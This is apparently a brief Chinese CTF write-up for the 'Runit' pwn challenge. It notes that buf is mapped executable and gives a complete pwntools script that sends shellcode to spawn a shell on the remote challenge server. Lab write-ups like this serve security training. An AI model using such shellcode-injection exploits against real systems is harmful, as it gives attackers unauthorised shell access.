Runit(vmmap的特性)

检查保护

1

只是开了NX

IDA静态分析

2

这里有个小知识点就是buf是由vmmap映射的,所以可读可写可执行

第15行去执行buf,那么我们直接写进shellcode就可以了

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *

context.log_level = "debug"
context.arch="i386"
io = remote("node4.buuoj.cn",25524)
#io = process('./runit')


shellcode = asm(shellcraft.sh())
io.sendline(shellcode)

io.interactive()